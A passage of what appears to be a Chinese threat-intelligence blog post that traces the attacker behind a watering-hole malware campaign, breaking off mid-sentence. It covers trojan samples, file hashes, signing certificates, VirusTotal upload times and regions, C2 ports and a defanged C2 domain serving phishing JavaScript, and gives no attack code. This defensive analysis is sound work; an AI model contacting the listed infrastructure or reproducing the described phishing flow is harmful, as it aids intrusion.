src="https://wechat2rss.xlab.app/img-proxy/?k=254089aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8KGz1Ce0C2JvXPic8btdZQU0UGicLDXPp7oybKKoVTfvMR2V7jvhmEEDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">攻击者身份溯源</span></span><span style="display: none;"></span></h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">事件木马样本</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我把本文所有相关联的木马样本整理成了一个 90 多行的表格，表格截图附在文末了。下面这里贴的是本次事件比较基础的样本（其实是初代目的表格，后来太多了单起文件了）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这里先来认识一下本次攻击事件中直接出现的几个木马样本，大致认个脸熟。这些样本几乎都是奇安信直接给出的MD5值，还有个别在 VT 顺着 relations 点两下就能找到，基本都属于 &#34;第一层&#34; 的样本。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以看到事件中暴露的 </span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">C2 端口常用 8848、8084</span></strong><span leaf="">，攻击者偏爱香港的 IP。</span></p><p><img data-imgfileid="100001423" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5555555555555556" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e7adfe16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8rO6pg7RcB5ic2ZpK9547TfKFdJHTcibiaFsvlOicCLvL8s1IjIHCZeXayg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">本次事件所有搜集到的样本中，只出现了 &#34;Chengdu Nuoxin Times Technology Co., Ltd.&#34; 这一个有效的签名，&#34;Octopus  Data Inc.&#34; 这个签名是无效的。</span></p><p><img data-imgfileid="100001315" class="rich_pages wxw-img" data-ratio="1.0679886685552409" data-s="300,640" data-type="png" data-w="1412" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4852ee50&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8gWX0TibAlVOSoBd9Bib9fXcLILftl8KMo0iahSjy6wbKaeVicPN5FJVlrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">初代目样本们的上传时间。当然 2037 年的 creat time 肯定是写马的人自己改的。</span></p><p><img data-imgfileid="100001422" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5333333333333333" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e7b463de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Sx94DdV8sg7B9bzscUPTTz9nbF5qefQFDCFyannrljsCPymhlbmncA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第一层拓展到的两个奇怪样本</span></span><span style="display: none;"></span></h3><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">MyBinder.exe</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">MyBinder.exe 这个样本是通过 31f84f78241819e6e6b9f80005bc97ae - sslupdate.dll 这个奇安信给出的样本关联到的。</span></p><p><img data-imgfileid="100001316" class="rich_pages wxw-img" data-ratio="0.45627644569816644" data-s="300,640" data-type="png" data-w="2836" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a4c283b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8PcjtlOIA8ZotEibs8eGLx6oic6H6hCTmfrGMrq4nr48Az7miaF6Or5MDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Mybinder.exe 释放了两个 .log文件（一开始VT显示的是Xworm V5.6.exe.log，后来才发现这里的文件会随着用户上传同hash样本而刷新文件名），并释放了 sslupdate.exe-7edc 和 sslupdate.dll-31f8。</span></p><p><img data-imgfileid="100001317" class="rich_pages wxw-img" data-ratio="0.2464255677039529" data-s="300,640" data-type="png" data-w="2378" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=cfbaeb1e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8V2XUw6JAN1xTN9hoJEvOFvlibrR7BlJ55I7xJyQvmoaaTNBzmibjFgLQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个样本在 2024-10-31 07:27:42 UTC（准确的话）被创建，在 2024-11-04 14:22:38 UTC 被上传到 VT，没过多久也被提交到 tria.ge（也可能是 VT 的 api 拉过去的），11月4号这个时间在整个本次攻击事件中算是比较早的时间点了。</span></p><p><img data-imgfileid="100001320" class="rich_pages wxw-img" data-ratio="0.45560109289617484" data-s="300,640" data-type="png" data-w="2928" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=74f20d8a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8qk2LulticUOazSVOZSTtqOibwc6fypcJaiawViaQibQ1PkgPk30Ogwe8wDg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">结合样本的文件名（主要是这点）、文件提交时间、释放出来的 &#34;Xworm V5.6.exe.log&#34; （这点是我搞错了，没想到VT上样本的dropped文件名竟然还会不断变化，我以为是攻击者测试样本故意放的假旗），起初我猜测这个样本是否是攻击者在正式行动之前的测试样本，上传到VT用来测试免杀来着，结果正式行动时不小心再次使用了用过一次的二阶段的  sslupdate.dll 导致被关联到。</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">f09da0df6007</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">继续分析发现，Mybinder.exe 释放的 sslupdate.exe-7edc 也被一个没有名字的样本释放过。由于攻击者用过很多 &#34;sslupdate.exe&#34;，所以不点开详情看很容易认为是已知样本，然后很容易就这么漏掉。</span></p><p><img data-imgfileid="100001319" class="rich_pages wxw-img" data-ratio="0.3935091277890467" data-s="300,640" data-type="png" data-w="2958" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=44b57859&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Tg1YWOEdKicHd3felI57K2r9HmNPceTjC7vZS5BQo9U8xsc8E780EoA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个样本在 2024-10-26 13:55:45 UTC 被创建，在 2024-11-04 10:19:23 UTC 被提交，创建时间比 Mybinder.exe 早 5 天，提交时间比Mybinder.exe 早 4 个小时。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">非常奇怪的是样本的查杀爆毒码清一色全是 Hive，Hive是之前比较头部的勒索软件。</span></p><p><img data-imgfileid="100001318" class="rich_pages wxw-img" data-ratio="0.6015625" data-s="300,640" data-type="png" data-w="1280" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=980cd775&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8EsP2MsTCractzjjFicOTARxvcCicUzicxWmhsscyibX4RZnTwrIFVvxLdg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这让我非常疑惑，尝试找出来是哪部分让这么多杀软集体报Hive，但是最终没有找到原因（也许是行为关联？）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是分析的时候看到这个样本释放了一个 xlsx 文件并打开，这引起了我的兴趣。</span></p><p><img data-imgfileid="100001321" class="rich_pages wxw-img" data-ratio="0.2558667676003028" data-s="300,640" data-type="png" data-w="2642" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=db6536b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ZBUsgDavib1biaLXt6ESPYkwq6ZJsr4dAGdpIuLQ1onVerzeIJUZK98w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001324" class="rich_pages wxw-img" data-ratio="0.5321375186846039" data-s="300,640" data-type="png" data-w="2676" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fb5489ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8LgVDnJX1gLWa9ugl7yV5ibsKHJo5yC7LEacZibz0HYicicc7SPVTzpYXUw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">一方面我好奇 xlsx 的文件内容，这个手法在大型活动中用来假冒文档钓目标员工比较常用。另一方面文档类文件常常会保存编辑者的信息，我寻思能不能在右键详细信息里面直接抓到攻击者的实名。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">结果文档的作者就是一个简单的 HP，不知道是不是惠普电脑的缩写。而文档内容就是空白的xlsx文档。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">另外还有个信息就是 f09da0df6007 的文件图标是 WPS 的文档图标，Mybinder.exe 的图标是 chrome 安装包的图标。</span></p><p><img data-imgfileid="100001323" class="rich_pages wxw-img" data-ratio="0.5912195121951219" data-s="300,640" data-type="png" data-w="2050" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4d6fce34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8mpLCWxwJAUOKqqsX8HhZSUjkpHrLMe7I1Y9lEWhvqT83T2ZO5m0WXQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">上传者</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看到这里，Mybinder.exe 和 f09da0df6007 是不是也让你感到很奇怪，杀软爆出奇怪的特征码、差劲的免杀效果、随意的文件名、空白的文档、比较早期的上传时间，我当时几乎认定这就是攻击者用来测试的样本了。</span></p><p><img data-imgfileid="100001322" class="rich_pages wxw-img" data-ratio="0.2857142857142857" data-s="300,640" data-type="png" data-w="1498" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b4e55284&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh87Uzhk2ficCwtAe7oicLjbdvAAz6TH00lpU1ial2p8wTG2nCnsHDjsr7vw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果这两个样本是攻击者本人上传，那么上传 IP 应该就是攻击者所在的地区（如果他没挂代理的话）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是看了一下 Mybinder.exe 、sslupdate.exe-7edc 、f09da0df6007 、sslupdate.dll-31f8 的上传地区，结果竟然</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">全部都是国内上传的。</span></strong></p><hr style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: solid;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 1px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: 1px;"/><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">到这里我又开始疑惑，如果样本确实是攻击者本人上传的，那么写马的人在国内？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果样本是受害者那边上传来的（没有名字的这种样本确实很像是杀软之类的途径传上来的），两个样本倒也确实都回连了 8848 端口的那个 C2，但是攻击者不修改木马的原始文件名，直接就拿来钓鱼是不是太草率了点。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">再就是这两个被上传的样本的时间都是11月初，这表明攻击者可能早在11月初就开始动手了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果我们是布置定向水坑的攻击者的话，已经中招的那些人是不是就没有必要在第一阶段的 js 当中保留他的 IP 地址了？不然钓鱼页面会一直给他弹，他都已经上线了还在弹。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而网页上的 js、木马、钓鱼页面全部都是动态的、可操纵替换的，</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">这就意味着我们在 12 月才拿到的 js、受害IP清单、C2、钓鱼页面可能都是不完整、不全面的。</span></strong></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">网络资产拓线分析</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">指奇安信给出的 IOC 以及点点鼠标就能找到的 &#34;第一层&#34; IOC 的拓线分析。</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第一次定性转折 - 银狐？</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">update.sslcsdn[.]com</span></code><span leaf=""> 是一个在攻击流程中非常靠前的 C2，因为按照奇安信文章里的说法，命中 IP清单的 IP 地址才会去 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/func.js" target="_blank">https://update.sslcsdn[.]com/func.js</a></span></code><span leaf=""> 拉取钓鱼页面。</span></p><p><img data-imgfileid="100001327" class="rich_pages wxw-img" data-ratio="0.46508279337652986" data-s="300,640" data-type="png" data-w="2778" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4bde6eee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8J5aicXiauykIhc3R2EiaGRoYm5p4p5N2k3QC8LO2L2iaN3Bia5n829IQGJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 VT 对各个 C2 地址逐一尝试拓线分析时，发现 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: 